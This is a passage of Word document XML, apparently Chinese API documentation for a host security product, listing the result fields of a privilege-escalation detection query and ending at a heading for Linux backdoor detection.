        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3A915084" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="317AC03E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D2DE6FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="750330ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1678FD12" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1AE4AFBB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73CA9B89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EBDD0D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13012AD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ED42037" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="71B02086" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="523652ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09183E92" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02250CCF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6269034A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2AD7BF97" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CDCA214" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0742943D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="203D99C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7640B11E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="19FD5BB4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31DDC8B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2469EB8D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E7E3640" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AF3E74E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="78D39F79" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27B3BCFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35662362" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A68288A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78E809F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="59E5DA25" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6999D546" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D97C30F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5222EE1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2115BC4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>发现时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5D2E22B4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61EEA72A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>procPid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B8FDB6A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78E12D39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7190DAFD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>提权进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6031FEDB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DF64AE7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>procName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CA44EE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46736BE7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54FF461F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>提权进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3A9852AF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="790B1177" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>procPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38A9F060" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A776D50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02A9791F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>提权进程路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6981F343" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00A8D4CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>procUserName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67F8830E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43C88DF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FFB5F3F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>提权用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1C2BD233" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="395E4973" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>procGroupName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7134A122" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B1685D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A18957D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户所属组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="282A2A5C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="582BB6AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>procFileMode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="200C2E58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E5AA67C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46B1A595" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>完整文件权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6AA6E444" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74A7CE1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parentProcPid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="649AD4F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22E93557" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67B01F1F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0E1BEC6A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F8FF626" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parentProcName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70E2C36D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46703292" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5950DC2F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0E31002D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60496337" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parentProcPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A702478" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B341A96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58ECC43B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0BFB723A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08E071AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parentProcUserName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2575BD96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30F6DEC3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09CCAC52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程启动用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3CE497D4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4859C388" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parentProcGroupName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36AF158B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75DA46DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51DD9687" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程用户所属组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7ACF280E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28A1713D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>processTreeList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5482071A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B575766" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00C0AD90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程树,按顺序为父进程至子进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1AB7FB42" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78408A82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F0E987B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DFC9F3E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F75F153" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否匹配白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F2EE16E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="159" w:name="linux后门检测"/>
      <w:bookmarkEnd w:id="157"/>
      <w:bookmarkEnd w:id="158"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Linux后门检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648AF341" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="160" w:name="查询结果-5"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
    </w:p>
